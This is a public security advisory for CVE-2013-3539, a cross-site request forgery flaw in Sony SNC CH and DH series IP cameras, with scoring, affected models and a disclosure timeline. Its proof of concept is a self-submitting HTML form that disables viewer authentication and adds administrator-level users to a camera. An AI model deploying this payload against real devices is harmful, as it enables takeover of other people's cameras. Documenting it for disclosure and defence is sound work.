Sony CH / DH Cross Site Request Forgery

2013.06.13
Credit: Jonas Ropero Castillo
Risk: Low
Local: No
Remote: Yes
CVE: CVE-2013-3539
CWE: CWE-352


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

SONY 1.Advisory Information Title: Sony CH, DH Series Vulnerability Date Published: 12/06/2013 Date of last updated: 12/06/2013 2.Vulnerability Description We have been found the next vulnerability in this devices -CVE-2013-3539. Cross Site Request Forgery(CWE-352) 3.Affected Products CVE-2013-3539, the following product are affected SNC CH140, SNC CH180, SNC CH240, SNC CH280, SNC DH140, SNC DH140T, SNC DH180, SNC DH240, SNC DH240T and SNC DH280. Its possible others models are affected but they were not checked. 4.PoC 4.1.Cross Site Request Forgery (CSRF) CVE-2013-3539, CSRF via POST method. Targeted attack to any administrator. These cameras use a web interface which is prone to CSRF vulnerabilities. A malicious user can try targeted attacks by sending a special CSRF vector. This allows you to manipulate web interface parameters. This is our .html attack. _____________________________________________________________________________ <html> <body> <form name="SonyCsRf" action="http://xx.xx.xx.xx/command/user.cgi" method="POST"> <input type="Select" name="ViewerModeDefault" value="00000fff"> <input type="Hidden" name="ViewerAuthen" value="off"> <input type="Hidden" name="Administrator" value="YWRtaW46YWRtaW4="> <input type="Hidden" name="User1" value="xxxx,c0000fff"> <input type="Hidden" name="User2" value="xxxx,c0000fff"> <input type="Hidden" name="User3" value="dG1wdG1wOnRtcHRtcA==,c0000fff"> <input type="Hidden" name="User4" value="Og==,00000fff"> <input type="Hidden" name="User5" value="Og==,00000fff"> <input type="Hidden" name="User6" value="Og==,00000fff"> <input type="Hidden" name="User7" value="Og==,00000fff"> <input type="Hidden" name="User8" value="Og==,00000fff"> <input type="Hidden" name="User9" value="Og==,00000fff"> <input type="Hidden" name="Reload" value="referer"> <script>document.SonyCsRf.submit();</script> </form> </body> </html> _____________________________________________________________________________ Now we can check that we have a new user in the configuration. 5.Credits CVE-2013-3539 was discovered by Jons Ropero Castillo. . 6.Report Timeline -2013-05-25: Students team notifies the Sony Customer Support of the vulnerability. No reply received.


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top